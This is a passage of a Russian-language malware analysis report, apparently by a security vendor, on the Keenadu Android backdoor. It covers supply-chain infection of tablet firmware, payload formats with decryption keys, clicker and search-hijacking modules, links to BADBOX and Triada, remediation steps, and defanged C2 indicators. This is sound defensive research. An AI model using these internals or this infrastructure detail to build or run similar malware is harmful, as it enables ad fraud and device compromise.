Ответ от командного сервера содержит поле code, в котором может находиться код ошибки, возвращаемый сервером. Если значение этого поля равно нулю, то ошибки нет. В этом случае в ответе будет поле data — зашифрованный аналогично данным из запроса JSON с информацией о полезных нагрузках.

Как Keenadu попал в libandroid_runtime.so

После анализа первых стадий заражения мы решили выяснить, как именно бэкдор попадал в прошивки Android-устройств. Мы практически сразу обнаружили в открытых источниках в Сети жалобы от пользователей планшетов производителя Alldocube на подозрительные DNS-запросы от устройств. Этот вендор ранее уже признавал наличие вредоносного ПО в одной из моделей планшетов. В опубликованном компанией заявлении, однако, не содержалось никаких подробностей о том, какой именно зловред попал на устройства и каким образом это случилось. Мы постараемся ответить на эти вопросы.

Жалоба пользователя на подозрительные DNS-запросы

DNS-запросы, описанные автором жалобы, нам тоже показались странными. По нашим данным, полученные на тот момент C2-домены Keenadu разрешались в IP-адреса, приведенные ниже.

• 67.198.232[.]4
• 67.198.232[.]187

В эти же адреса разрешались домены keepgo123[.]com и gsonx[.]com, что может свидетельствовать о том, что планшет автора жалобы тоже заражен Keenadu. Однако одного совпадения IP-адресов недостаточно для того, чтобы уверенно это утверждать. Чтобы проверить гипотезу, необходимо изучить само устройство. Мы рассматривали опцию приобрести такую же модель планшета, однако это не понадобилось: как выяснилось, Alldocube публикует архивы с прошивками для своих устройств в открытом доступе, так что любой желающий может проверить их на наличие вредоносного ПО.

Чтобы проанализировать прошивку, сначала нужно изучить, в каком формате хранится содержимое. Прошивки для устройств Alldocube представляют из себя RAR-архивы, которые содержат различные образы и другие файлы, а также утилиту для прошивки в формате исполняемого файла для Windows. Наибольшую ценность с точки зрения анализа представляет файловая система Android. Основные ее разделы, включая системный, находятся в одном из образов под названием super.img. Это файл Android Sparse Image. Для краткости изложения опустим описание этого формата (его можно, к примеру, восстановить из кода libsparse); отметим лишь, что существуют утилиты с открытым исходным кодом для извлечения разделов из таких файлов в виде образа файловой системы.

Мы извлекли libandroid_runtime.so из прошивки для Alldocube iPlay 50 mini Pro (T811M) от 18 августа 2023 года. Изучив библиотеку, мы обнаружили в ней бэкдор Keenadu. Более того, мы расшифровали полезную нагрузку и извлекли оттуда адреса командных серверов, которые располагались на доменах keepgo123[.]com и gsonx[.]com, что подтверждает подозрения пользователя — его устройства заражены этим же бэкдором. Более того, все последующие версии прошивок для данной модели тоже оказались зараженными, включая те, которые вышли уже после публикации заявления вендора.

Отдельное внимание следует уделить прошивкам для модели Alldocube iPlay 50 mini Pro NFE. Аббревиатура NFE (Netflix Enabled) в ее названии означает, что такие устройства имеют дополнительный DRM-модуль, позволяющий пользоваться стриминговыми сервисами в высоком качестве. Для этого они должны соответствовать стандарту Widevine L1 по системе защиты премиальных медиа Google Widevine DRM. Соответственно, они обрабатывают медиа в TEE (Trusted Execution Environment), что уменьшает риск доступа к фильму или сериалу со стороны недоверенного кода и, как следствие, не позволяет несанкционированно копировать медиа. Хотя сертификация по Widevine не защитила эти устройства от заражения, в отличие от других моделей, самая первая прошивка Alldocube iPlay 50 mini Pro NFE, выпущенная 7 ноября 2023 года, была чистой. При этом все остальные, включая самую свежую версию от 20 мая 2024 года, содержали Keenadu.

В ходе анализа прошивок для устройств Alldocube мы обнаружили, что они все имеют валидную подпись. Это значит, что для внедрения бэкдора в libandroid_runtime.so злоумышленнику недостаточно было взломать сервер с OTA-обновлениями. Помимо этого нужно было каким-то образом завладеть ключами для их подписи, которые в норме не должны быть доступны с OTA-сервера. Вероятнее всего, троянец попал в прошивку на этапе сборки.

Также нам удалось обнаружить статическую библиотеку libVndxUtils.a (ca98ae7ab25ce144927a46b7fee6bd21), содержащую код Keenadu, что дополнительно подтверждает нашу гипотезу. Эта вредоносная библиотека написана на языке C++ и собрана с помощью системы сборки CMake. Интересно, что в библиотеке также остались пути до файлов с исходным кодом на машине разработчика.

• D:\work\git\zh\os\ak-client\ak-client\loader\src\main\cpp\__log_native_load.cpp — в этом файле расположен код дроппера.
• D:\work\git\zh\os\ak-client\ak-client\loader\src\main\cpp\__log_native_data.cpp — в этом файле находится зашифрованная с помощью RC4 полезная нагрузка, а также ее размер.

Точкой входа дроппера является функция __log_check_tag_count. Злоумышленник вставил вызов этой функции в реализацию метода println_native.

Участок кода, куда злоумышленник вставил вредоносный вызов

По нашим данным, вредоносная зависимость располагалась в репозитории с исходным кодом прошивки по следующим путям.

• vendor/mediatek/proprietary/external/libutils/arm/libVndxUtils.a
• vendor/mediatek/proprietary/external/libutils/arm64/libVndxUtils.a

Интересно, что троянец в libandroid_runtime.so расшифровывает и записывает на диск полезную нагрузку по пути /data/dalvik-cache/arm[64]/system@framework@[email protected]. Вероятнее всего, злоумышленник таким образом пытался замаскировать вредоносную зависимость libandroid_runtime.so под якобы легитимный компонент vndx с проприетарным кодом от вендора MediaTek. В действительности же такого компонента в продуктах MediaTek не существует.

Наконец, по данным нашей телеметрии, троянец встречается не только в устройствах Alldocube, но и в устройствах других производителей. Во всех случаях бэкдор встроен в прошивки для планшетов. Мы предупредили вендоров о заражении.

Исходя из всего вышесказанного, мы считаем, что Keenadu попал в прошивки Android-устройств в результате атаки на цепочку поставок — один из этапов цепочки поставок прошивок оказался скомпрометирован, из-за чего в их исходные коды попала вредоносная зависимость. Таким образом, вендоры могли не подозревать, что их устройства заражены еще до поступления в продажу.

Модули бэкдора Keenadu

Как мы уже отметили, Keenadu в силу своей архитектуры позволяет атакующим получить практически неограниченный контроль над устройством жертвы. Чтобы понять, как именно они воспользовались этой особенностью бэкдора, мы решили проанализировать скачиваемые им полезные нагрузки. Для этого мы создали запрос якобы от лица зараженного устройства для командного сервера. На наш первый запрос С2-сервер не отправил никаких файлов. Вместо этого он вернул время для следующего запроса — через 2,5 месяца после первого. В ходе анализа командного сервера методом «черного ящика» нам удалось установить, что в запросе содержится время активации бэкдора и, если с его момента не прошло 2,5 месяца, то C2 не возвращает полезные нагрузки. Вероятно, это сделано с целью затруднить анализ и уменьшить вероятность обнаружения этих нагрузок. После того как мы изменили в запросе время активации на достаточно давнее, командный сервер вернул нам список полезных нагрузок для анализа.

Сервер злоумышленников присылает информацию о полезных нагрузках в виде массива объектов. Каждый из таких объектов содержит ссылку на скачивание полезной нагрузки, а также ее MD5, имена пакетов целевых приложений, имена целевых процессов и др. Пример такого объекта приведен ниже. В качестве сервиса для построения CDN злоумышленники выбрали Alibaba Cloud.

Пример информации о полезной нагрузке

Скачиваемые Keenadu файлы имеют свой формат, в котором хранится зашифрованная полезная нагрузка и ее конфигурация. Описание формата файла на псевдокоде представлено ниже (struct KeenaduPayload).

struct KeenaduChunk {
    uint32_t size;
    uint8_t data[size];
} __packed;

struct KeenaduPayload {
    int32_t version;
    uint8_t padding[0x100];
    uint8_t salt[0x20];
    KeenaduChunk config;
    KeenaduChunk payload;
    KeenaduChunk signature;
} __packed;

После скачивания Keenadu проверяет целостность файла с помощью MD5. Также авторы троянца реализовали механизм подписи кода при помощи алгоритма DSA, которая проверяется перед расшифрованием и запуском полезной нагрузки. Это означает, что только злоумышленник, владеющий приватным ключом, может создавать вредоносные полезные нагрузки. В случае успешной проверки подписи конфигурация и вредоносный модуль расшифровываются с помощью AES-128 в режиме CFB. Ключом для расшифрования является MD5-хэш, посчитанный от конкатенации строки 37d9a33df833c0d6f11f1b8079aaa2dc и «соли» (salt), вектором инициализации — строка 0102030405060708.

Конфигурация содержит информацию о точках входа и выхода модуля, его название и версию. Пример конфигурации одного из модулей приведен ниже.

{
    "stopMethod": "stop",
    "startMethod": "start",
    "pluginId": "com.ak.p.wp",
    "service": "1",
    "cn": "com.ak.p.d.MainApi",
    "m_uninit": "stop",
    "version": "3117",
    "clazzName": "com.ak.p.d.MainApi",
    "m_init": "start"
}

Теперь, когда мы описали алгоритм загрузки бэкдором вредоносных модулей, перейдем к их анализу.

Загрузчик Keenadu

Этот модуль (MD5: 4c4ca7a2a25dbe15a4a39c11cfef2fb2) нацелен на популярные онлайн-магазины со следующими именами пакетов.

• com.amazon.mShop.android.shopping (Amazon)
• com.zzkko (SHEIN)
• com.einnovation.temu (Temu)

Его точкой входа является метод start класса com.ak.p.d.MainApi. Этот класс запускает вредоносную задачу под названием HsTask. Она представляет собой загрузчик, концептуально похожий на AKServer. В начале своей работы загрузчик собирает данные о зараженном устройстве (модель устройства, IMEI, MAC-адрес, версия ОС и т. д.), а также информацию о приложении, в котором он работает. Полученные данные кодируются таким же образом, как и запросы от AKServer по пути /ak/api/pts/v4. После кодирования загрузчик отправляет данные POST-запросом на C2-сервер по пути /ota/api/tasks/v3.

Сбор данных плагином

В ответ сервер злоумышленников возвращает список модулей для скачивания и выполнения, а также список APK-файлов для установки на устройство жертвы. Интересно, что в новых версиях Android доставка этих APK реализована через установочные сессии. Вероятно, зловред таким образом пытается обойти ограничения, введенные в последних версиях ОС: приложения из сторонних источников не могут в них получить доступ к опасным разрешениям, в частности к «специальным возможностям».

Использование установочной сессии

К сожалению, в ходе исследования нам не удалось получить примеры модулей и APK-файлов, которые скачивает этот загрузчик. Однако пользователи в Сети жаловались, что зараженные планшеты добавляли товары в корзины маркетплейсов без ведома пользователя.

Жалоба пользователя на Reddit

Загрузчик кликеров

Такие модули (пример: ad60f46e724d88af6bcacb8c269ac3c1) встраиваются в следующие приложения.

• Системный менеджер обоев (com.android.wallpaper)
• YouTube (com.google.android.youtube)
• Facebook (com.facebook.katana)
• Цифровое благополучие (com.google.android.apps.wellbeing)
• Системное приложение для рабочего стола (com.android.launcher3)

В начале работы вредоносный модуль получает данные о местоположении и IP-адрес устройства с помощью сервиса GeoIP, развернутого на командном сервере злоумышленников. Полученные данные, а также тип подключения к Сети и версия ОС отправляются на командный сервер. Тот в ответ возвращает файл специального формата, в котором содержится зашифрованный JSON с информацией о полезных нагрузках, а также ключ для расшифрования JSON с помощью XOR. Структура такого файла описана ниже с использованием псевдокода.

struct Payload {
    uint8_t magic[10]; // == "encrypttag"
    uint8_t keyLen;
    uint8_t xorKey[keyLen];
    uint8_t payload[];
} __packed;

Полученный после расшифрования JSON представляет собой массив объектов, содержащих ссылки на скачивание полезных нагрузок, а также информацию о точках входа. Пример такого объекта приведен ниже. Полезные нагрузки зашифрованы по такому же принципу, что и JSON с информацией о них.

Пример информации о полезной нагрузке

При исследовании мы получили несколько полезных нагрузок, основная цель которых — взаимодействие с рекламными элементами на сайтах различной тематики (сайты с играми, сайты с рецептами, новостные сайты). Конкретный модуль взаимодействует с одним конкретным сайтом, адрес которого зашит в его коде.

Модуль для браузера Chrome

Модуль (MD5: 912bc4f756f18049b241934f62bfb06c) нацелен на браузер Google Chrome (com.android.chrome). В самом начале своей работы он регистрирует обработчик событий жизненного цикла активностей приложения (Activity Lifecycle Callbacks). При запуске каждой активности в целевом приложении этот обработчик проверяет ее имя. Если оно совпадает с ChromeTabbedActivity, троянец ищет поле для ввода текста (поисковых запросов и адресов веб-сайтов) под названием url_bar.

Поиск текстового элемента url_bar

Если такой элемент найден, зловред отслеживает изменения текста в нем. Все поисковые запросы, вводимые пользователем в url_bar, отправляются на сервер злоумышленников. Помимо этого, после окончания ввода запроса троянец также может подменять поисковик пользователя в зависимости от конфигурации, полученной с сервера злоумышленника.

Подмена поисковика

Надо сказать, что подмена поисковика может не сработать, если пользователь выберет формулировку запроса из подсказок, потому что в этом случае не происходит нажатия клавиши Enter/кнопки поиска в поле url_bar, которое должно сигнализировать зловреду о запуске поиска. Однако злоумышленники оказались готовы и к этому. Троянец пытается найти в текущей активности элемент omnibox_suggestions_dropdown, который представляет из себя группу графических элементов (ViewGroup) — подсказок поисковика. Троянец отслеживает нажатия на подсказки и подменяет поисковик.

Подмена поисковика при нажатии на один из предложенных браузером вариантов

Кликер Nova (Phantom)

Модуль в самом начале (MD5: f0184f6955479d631ea4b1ea0f38a35d) представлял из себя кликер, который встраивался в системный менеджер обоев (com.android.wallpaper). Параллельно с нами его обнаружили исследователи из Dr.Web, которые, однако, не упомянули в своем отчете вектор распространения кликера через бэкдор Keenadu. Модуль использует технологии машинного обучения и WebRTC для взаимодействия с рекламными элементами. Коллеги из Dr.Web назвали его Phantom, однако в ответе от командного сервера он называется Nova. Более того, запускаемая в коде задача также называется NovaTask. Исходя из этого, мы считаем, что оригинальное название кликера — Nova.

Nova — название плагина

Отметим также, что спустя некоторое время после публикации отчета про этот кликер командный сервер Keenadu начал удалять его с зараженных устройств. Вероятнее всего, злоумышленники таким образом стараются избежать обнаружения.

Запрос на выгрузку модуля Nova

При этом в запросе на выгрузку модуль Nova имел несколько другое название. Мы считаем, что под новым названием скрывается последняя версия модуля, которая представляет собой загрузчик и может скачивать следующие модули.

• Кликер Nova.
• Шпионский модуль, который загружает различную информацию об устройстве жертвы на сервер злоумышленников.
• Дроппер Gegu SDK. Этот модуль, по нашим данным, представляет собой многоуровневый дроппер, который запускает два других кликера.

Монетизация установок

Модуль с MD5-хэшем 3dae1f297098fa9d9d4ee0335f0aeed3 встраивается в системное приложение для рабочего стола (com.android.launcher3). В начале своей работы он проверяет окружение на артефакты виртуальной машины. Если они не найдены, зловред регистрирует обработчик событий сессионной установки приложений.

Регистрация обработчика

Параллельно с этим модуль запрашивает конфигурацию с командного сервера. Пример такой конфигурации приведен ниже.

Пример конфигурации модуля монетизации

Когда на устройстве запускается установка приложения, троянец отправляет информацию об этом приложении на командный сервер. В ответ командный сервер предоставляет информацию о рекламном объявлении, которое его продвигает.

Информация о рекламном источнике приложения

Для каждой успешно завершенной установочной сессии троянец выполняет GET-запросы по ссылке из поля tracking_link в ответе, а также по первой ссылке из массива click. Ссылки из массива click, судя по коду, представляют из себя шаблоны, в которые подставляются различные рекламные идентификаторы. Скорее всего, таким образом злоумышленники пытаются монетизировать установки приложений. Для этого троянец имитирует трафик с устройства жертвы, убеждая рекламные платформы, что приложение было установлено после перехода из рекламы.

Модуль для Google Play

Хотя AKClient прекращает выполнение, если обнаруживает себя в процессе Google Play, нам удалось получить с C2-сервера полезную нагрузку для этого процесса. Этот модуль (MD5: 529632abf8246dfe555153de6ae2a9df) получает рекламный идентификатор Google Ads и сохраняет его с помощью глобального экземпляра класса Settings по ключу S_GA_ID3. В дальнейшем другие модули могут использовать его как идентификатор жертвы.

Получение рекламного идентификатора

Другие векторы распространения Keenadu

В ходе исследования мы решили поискать другие источники заражения Keenadu. В результате мы обнаружили, что некоторые модули, описанные выше, фигурировали в атаках, не связанных с заражением libandroid_runtime.so. Расскажем о них подробнее.

Системные приложения

По данным нашей телеметрии, загрузчик Keenadu встречался в различных системных приложениях в прошивках некоторых устройств. Одним из таких приложений (MD5: d840a70f2610b78493c41b1a344b6893) оказалась служба для распознавания лиц с именем пакета com.aiworks.faceidservice. В ней содержится набор обученных моделей машинного обучения, позволяющий распознавать лица, чтобы, в частности, авторизоваться с их помощью. Для этого приложение определяет сервис com.aiworks.lock.face.service.FaceLockService, который используется системным интерфейсом (com.android.systemui) для разблокировки устройства с помощью распознавания лица.

Использование сервиса для распознавания лиц в системном интерфейсе

В методе onCreate сервиса com.aiworks.lock.face.service.FaceLockService, который будет вызван при создании сервиса, регистрируются три ресивера, которые отслеживают события включения и выключения экрана, старта зарядки, а также появления доступа к Сети. Каждый из ресиверов вызывает метод startMars, основная цель которого — инициализировать вредоносный загрузчик с помощью вызова метода init класса com.hs.client.TEUtils.

Вредоносный вызов

Загрузчик является немного измененной версией загрузчика Keenadu. Эта версия использует нативную библиотеку libhshelper.so для загрузки модулей, а также для установки APK. Для этих целей библиотека определяет соответствующие нативные методы класса com.hs.helper.NativeMain.

Нативные методы, определяемые библиотекой

Такой вектор атаки — встраивание загрузчика в системные приложения — сам по себе не является новинкой. До этого мы уже описывали подобные случаи, например загрузчик Dwphon, который встраивался в системные приложения для OTA-обновлений. Однако мы впервые сталкиваемся с троянцем в сервисе для распознавания лиц.

Помимо сервиса распознавания лиц мы обнаружили и другие системные приложения, зараженные загрузчиком Keenadu. Среди них — приложение для рабочего стола (launcher) на некоторых устройствах (MD5: 382764921919868d810a5cf0391ea193). В такие приложения был встроен вредоносный сервис com.pri.appcenter.service.RemoteService, инициирующий запуск троянца.

Также мы обнаружили загрузчик Keenadu в приложении с именем пакета com.tct.contentcenter (d07eb2db2621c425bda0f046b736e372). В него встроен рекламный SDK fwtec, который получал конфигурацию при помощи запроса HTTP GET по адресу hxxps://trends.search-hub[.]cn/vuGs8 c отключенным перенаправлением по умолчанию. В ответ троянец ждал код 302 (перенаправление) с URL в заголовке Location, в параметрах которого и содержалась конфигурация SDK. Один из параметров — hsby_search_switch — регулировал запуск загрузчика Keenadu: если его значение было равно 1, загрузчик запускался в приложении.

Получение конфигурации от C2

Загрузка другими бэкдорами

При анализе нашей телеметрии мы обнаружили необычную версию загрузчика Keenadu (MD5: f53c6ee141df2083e0200a514ba19e32) в директориях различных приложений во внешнем хранилище, расположенных по пути вида /storage/emulated/0/Android/data/%PACKAGE%/files/.dx/. Судя по коду, загрузчик был рассчитан на работу в системе со скомпрометированным процессом system_server. При этом названия binder-интерфейсов в нем отличались от интерфейсов AKServer. Загрузчик использовал следующие интерфейсы.

• com.androidextlib.sloth.api.IPServiceM
• com.androidextlib.sloth.api.IPermissionsM

Такие же binder-интерфейсы определяет другой бэкдор, устроенный похожим образом и также обнаруженный в libandroid_runtime.so. Запуск этого бэкдора на зараженных устройствах происходит следующим образом: libandroid_runtime.so импортирует вредоносную функцию __android_log_check_loggable из библиотеки liblog.so (MD5: 3d185f30b00270e7e30fc4e29a68237f). Эта функция вызывается в реализации нативного метода println_native класса android.util.Log. Она расшифровывает с помощью однобайтового XOR полезную нагрузку, зашитую в теле библиотеки, и запускает ее в контексте всех приложений на устройстве.

Расшифрование полезной нагрузки

Полезная нагрузка имеет много сходств с бэкдором BADBOX — комплексной вредоносной платформой, которую впервые описали исследователи из HUMAN Security. В частности, совпадают пути на С2-серверах, на которые троянец отправляет HTTP-запросы. Поэтому мы считаем, что это одна из версий BADBOX.

Путь /terminal/client/register встречался в отчете HUMAN Security

В этом бэкдоре мы обнаружили и binder-интерфейсы, которые использовал упомянутый выше загрузчик Keenadu. Это указывает на то, что соответствующие экземпляры Keenadu устанавливал именно BADBOX.

Один из binder-интерфейсов, используемых Keenadu, определен в полезной нагрузке

Модификации популярных приложений

К сожалению, если в вашей прошивке не обнаружен Keenadu или другой предустановленный бэкдор, это не значит, что троянец вам не угрожает. Так, кликер Nova (Phantom) параллельно с нами обнаружили исследователи из Dr.Web. В их отчете описан другой вектор распространения, а именно — через модификации популярных программ, доставляемых преимущественно через неофициальные источники, а также различные приложения в магазине GetApps.

Google Play

Зараженные приложения проникли и в Google Play. В ходе исследования мы обнаружили троянизированное ПО для умных камер, опубликованное в официальном магазине Android-приложений. Суммарное число скачиваний превышало 300 тысяч.

Зараженные приложения в Google Play

В каждое из этих приложений был встроен сервис com.arcsoft.closeli.service.KucopdInitService, который запускал все тот же кликер Nova. Мы предупредили Google о наличии зараженных приложений в магазине, и разработчики удалили их. Интересно, что вредоносный сервис присутствовал во всех приложениях, но мог запускаться только в одном из них — с именем пакета com.taismart.global.

Вредоносный сервис запускался только при определенных условиях

Фантастическая четверка: как связаны Triada, BADBOX, Vo1d и Keenadu

Обнаружив, что BADBOX скачивает один из модулей Keenadu, мы решили провести дополнительное исследование и выяснить, нет ли еще каких-нибудь признаков связи этих троянцев. В результате мы обнаружили, что BADBOX и Keenadu имеют сходства в коде полезной нагрузки, которую расшифровывает и запускает вредоносный код в libandroid_runtime.so. Также мы обнаружили сходства загрузчика Keenadu и модуля BB2DOOR троянца BADBOX. Учитывая, что в коде есть и явные различия, а также тот факт, что BADBOX скачивал загрузчик Keenadu, мы полагаем, что это все же разные ботнеты, а разработчики Keenadu, скорее всего, вдохновлялись кодом BADBOX. Более того, авторы Keenadu нацелены преимущественно на Android-планшеты.

В нашем последнем отчете про бэкдор Triada мы упомянули, что командный сервер одного из скачиваемых им модулей располагался на том же домене, что и один из командных серверов ботнета Vo1d, что может свидетельствовать о связи этих двух троянцев. Однако в ходе текущего исследования нам удалось обнаружить связь Triada и с ботнетом BADBOX. Как оказалось, в директориях, куда BADBOX скачивал загрузчик Keenadu, также располагались другие полезные нагрузки для различных приложений. Их описание заслуживает отдельного отчета, и для краткости изложения мы не будем вдаваться в детали в текущей статье, ограничившись анализом полезной нагрузки для клиентов Telegram и Instagram* (MD5: 8900f5737e92a69712481d7a809fcfaa). Точкой входа этой полезной нагрузки является класс com.extlib.apps.InsTGEnter. Она предназначена для кражи учетных данных от аккаунтов жертв в зараженных сервисах. Интересно, что в ней также есть код для кражи учетных данных из клиента WhatsApp, который, однако, никак не используется.

Код полезной нагрузки BADBOX, используемый для кражи учетных данных из WhatsApp-клиентов

Адреса командных серверов, на которые троянец загружает данные с устройства, хранятся в коде в зашифрованном виде. Они декодируются с помощью base64 и расшифровываются с помощью XOR со строкой xiwljfowkgs.

Расшифрованные адреса командных серверов полезной нагрузки

Мы расшифровали командные серверы зловреда и обнаружили уже известный нам домен zcnewy[.]com. Этот домен мы встречали в 2022 году во вредоносных модификациях WhatsApp, содержащих Triada. Тогда мы полагали, что участок кода, предназначенный для похищения учетных данных из клиента WhatsApp, и вредоносный дроппер относятся к Triada. Учитывая, что выше мы показали, что домен zcnewy[.]com связан с BADBOX, мы считаем, что в 2022 году зараженные модификации WhatsApp, описанные нами, содержали два разных троянца — Triada и BADBOX. Чтобы подтвердить эту гипотезу, мы повторно изучили одну из этих модификаций (caa640824b0e216fab86402b14447953) и выяснили, что в нее был встроен код дроппера Triada и модуля BADBOX, похожего по функциональности на описанный выше. Троянцы, хоть и запускались из одной точки входа, между собой никак не взаимодействовали и были устроены совершенно по-разному. Исходя из этого, мы считаем, что в 2022 году мы наблюдали совместную атаку BADBOX и Triada.

Запуск BADBOX и Triada из одной точки входа

Таким образом, можно сделать вывод, что несколько крупнейших Android-ботнетов взаимодействуют друг с другом. На данный момент нам удалось подтвердить связь Triada с Vo1d и BADBOX, а также Keenadu с BADBOX. Исследователи из HUMAN Security также отмечали пересечения между Vo1d и BADBOX. При этом описанные отношения      не являются транзитивными. Например, из связи Triada и Keenadu с BADBOX вовсе не следует, что Triada и Keenadu связаны между собой; последнее утверждение требует отдельного доказательства. Однако мы не удивимся, если в скором времени появятся отчеты, которые позволят доказать транзитивность этих связей.

Жертвы

По данным нашей телеметрии, с Keenadu или его модулями столкнулись 13 715 пользователей по всему миру. Наибольшее число пользователей, атакованных зловредом, наши защитные решения зафиксировали в России, Японии, Германии, Бразилии и Нидерландах.

Наши рекомендации

Нашу службу технической поддержки часто спрашивают, какие действия необходимо предпринять, если защитное решение обнаружило на устройстве Keenadu. В этом разделе рассмотрим все возможные сценарии борьбы с троянцем.

Если заражена библиотека libandroid_runtime.so

В современных версиях Android системный раздел, в котором в том числе находится libandroid_runtime.so, смонтирован в режиме «только для чтения». Даже если теоретически допустить возможность редактирования этого раздела, зараженную библиотеку libandroid_runtime.so не получится удалить без повреждения прошивки: устройство попросту перестанет загружаться. Поэтому устранить угрозу штатными средствами ОС Android не получится. Эксплуатация зараженного бэкдором Keenadu устройства при этом может быть сопряжена с большим количеством неудобств.

Например, в отзывах к зараженным устройствам покупатели жалуются на назойливую рекламу, а также на появление различных звуков, источник которых установить не удается.

Отзыв к зараженным планшетам

Если вы столкнулись с бэкдором Keenadu, мы рекомендуем сделать следующее.

• Проверить наличие обновлений ПО. Возможно, для вашего устройства уже вышла чистая прошивка. После обновления необходимо проверить с помощью надежного защитного решения, что проблема устранена.
• Если чистого обновления прошивки от производителя для вашего устройства не существует, можно установить чистую прошивку самостоятельно. При этом важно помнить, что самостоятельная прошивка устройства может вывести его из строя.
• До замены или обновления прошивки мы рекомендуем отказаться от использования зараженного устройства.

Если заражено одно из системных приложений

К сожалению, как и в предыдущем случае, удалить такое приложение с устройства не получится, поскольку оно находится в системном разделе. Если вы столкнулись с загрузчиком Keenadu в системном приложении, мы рекомендуем следующее.

1. Если это возможно, найти замену приложению. Например, если заражено приложение для рабочего стола, можно скачать любой аналог, не содержащий вредоносного ПО. Если же аналогов для приложения не существует (например, заражен сервис для распознавания лиц), мы рекомендуем по возможности не использовать соответствующую функциональность.
2. Отключить зараженное приложение с помощью ADB, если для него был найден аналог или от его функциональности можно отказаться. Это можно сделать командой adb shell pm disable --user 0 %PACKAGE%.

Если на устройство установили зараженное приложение

Это один из наиболее простых случаев заражения. Если защитное решение обнаружило на вашем устройстве приложение, зараженное Keenadu, достаточно просто удалить приложение, следуя указаниям защитного решения.

Заключение

Разработчики предустановленных бэкдоров в прошивках Android-устройств всегда отличались высокой квалификацией. В случае с Keenadu это тоже так: авторы зловреда хорошо понимают устройство Android и процесс запуска приложений, а также основные принципы безопасности операционной системы. В ходе исследования нас удивил размах кампаний Keenadu: помимо основного бэкдора в прошивках его модули встречались в системных приложениях и даже в приложениях из Google Play. Это ставит троянца по масштабам в один ряд с такими зловредами, как Triada или BADBOX. Появление нового предустановленного бэкдора такого масштаба означает, что эта категория зловредов — отдельный рынок с большой конкуренцией.

Keenadu представляет из себя масштабную и сложно устроенную вредоносную платформу, которая предоставляет атакующим неограниченный контроль над устройством жертвы. Хотя на данный момент нам удалось показать, что бэкдор используется преимущественно для разного рода рекламного мошенничества, мы не исключаем, что в дальнейшем зловред может, к примеру, пойти по пути Triada и начать похищать учетные данные.

Индикаторы компрометации

Дополнительные индикаторы компрометации, технические подробности и правило YARA для детектирования активности Keenadu доступны клиентам сервиса Threat Intelligence. Для получения более подробной информации свяжитесь с нами по адресу [email protected].

Вредоносные библиотеки libandroid_runtime.so
bccd56a6b6c9496ff1acd40628edd25e
c4c0e65a5c56038034555ec4a09d3a37
cb9f86c02f756fb9afdb2fe1ad0184ee
f59ad0c8e47228b603efc0ff790d4a0c
f9b740dd08df6c66009b27c618f1e086
02c4c7209b82bbed19b962fb61ad2de3
185220652fbbc266d4fdf3e668c26e59
36db58957342024f9bc1cdecf2f163d6
4964743c742bb899527017b8d06d4eaa
58f282540ab1bd5ccfb632ef0d273654
59aee75ece46962c4eb09de78edaa3fa
8d493346cb84fbbfdb5187ae046ab8d3
9d16a10031cddd222d26fcb5aa88a009
a191b683a9307276f0fc68a2a9253da1
65f290dd99f9113592fba90ea10cb9b3
68990fbc668b3d2cfbefed874bb24711
6d93fb8897bf94b62a56aca31961756a

Нагрузки Keenadu
2922df6713f865c9cba3de1fe56849d7
3dae1f297098fa9d9d4ee0335f0aeed3
462a23bc22d06e5662d379b9011d89ff
4c4ca7a2a25dbe15a4a39c11cfef2fb2
5048406d8d0affa80c18f8b1d6d76e21
529632abf8246dfe555153de6ae2a9df
7ceccea499cfd3f9f9981104fc05bcbd
912bc4f756f18049b241934f62bfb06c
98ff5a3b5f2cdf2e8f58f96d70db2875
aa5bf06f0cc5a8a3400e90570fb081b0
ad60f46e724d88af6bcacb8c269ac3c1
dc3d454a7edb683bec75a6a1e28a4877
f0184f6955479d631ea4b1ea0f38a35d

Системные приложения, зараженные загрузчиком Keenadu
07546413bdcb0e28eadead4e2b0db59d
0c1f61eeebc4176d533b4fc0a36b9d61
10d8e8765adb1cbe485cb7d7f4df21e4
11eaf02f41b9c93e9b3189aa39059419
19df24591b3d76ad3d0a6f548e608a43
1bfb3edb394d7c018e06ed31c7eea937
1c52e14095f23132719145cf24a2f9dc
21846f602bcabccb00de35d994f153c9
2419583128d7c75e9f0627614c2aa73f
28e6936302f2d290c2fec63ca647f8a6
382764921919868d810a5cf0391ea193
45bf58973111e00e378ee9b7b43b7d2d
56036c2490e63a3e55df4558f7ecf893
64947d3a929e1bb860bf748a15dba57c
69225f41dcae6ddb78a6aa6a3caa82e1
6df8284a4acee337078a6a62a8b65210
6f6e14b4449c0518258beb5a40ad7203
7882796fdae0043153aa75576e5d0b35
7c3e70937da7721dd1243638b467cff1
9ddd621daab4c4bc811b7c1990d7e9ea
a0f775dd99108cb3b76953e25f5cdae4
b841debc5307afc8a4592ea60d64de14
c57de69b401eb58c0aad786531c02c28
ca59e49878bcf2c72b99d15c98323bcd
d07eb2db2621c425bda0f046b736e372
d4be9b2b73e565b1181118cb7f44a102
d9aecc9d4bf1d4b39aa551f3a1bcc6b7
e9bed47953986f90e814ed5ed25b010c

Приложения, зараженные кликером Nova
0bc94bc4bc4d69705e4f08aaf0e976b3
1276480838340dcbc699d1f32f30a5e9
15fb99660dbd52d66f074eaa4cf1366d
2dca15e9e83bca37817f46b24b00d197
350313656502388947c7cbcd08dc5a95
3e36ffda0a946009cb9059b69c6a6f0d
5b0726d66422f76d8ba4fbb9765c68f6
68b64bf1dea3eb314ce273923b8df510
9195454da9e2cb22a3d58dbbf7982be8
a4a6ff86413b3b2a893627c4cff34399
b163fa76bde53cd80d727d88b7b1d94f
ba0a349f177ffb3e398f8c780d911580
bba23f4b66a0e07f837f2832a8cd3bd4
d6ebc5526e957866c02c938fc01349ee
ec7ab99beb846eec4ecee232ac0b3246
ef119626a3b07f46386e65de312cf151
fcaeadbee39fddc907a3ae0315d86178

CDN для доставки полезных нагрузок
ubkt1x.oss-us-west-1.aliyuncs[.]com
m-file-us.oss-us-west-1.aliyuncs[.]com
pkg-czu.istaticfiles[.]com
pkgu.istaticfiles[.]com
app-download.cn-wlcb.ufileos[.]com

C2-серверы
110.34.191[.]81
110.34.191[.]82
67.198.232[.]4
67.198.232[.]187
fbsimg[.]com
tmgstatic[.]com
gbugreport[.]com
aifacecloud[.]com
goaimb[.]com
proczone[.]com
gvvt1[.]com
dllpgd[.]click
fbgraph[.]com
newsroomlabss[.]com
sliidee[.]com
keepgo123[.]com
gsonx[.]com
gmsstatic[.]com
ytimg2[.]com
glogstatic[.]com
gstatic2[.]com
uscelluliar[.]com
playstations[.]click

* Instagram принадлежит корпорации Meta, которая признана экстремистской в Российской Федерации

Введение

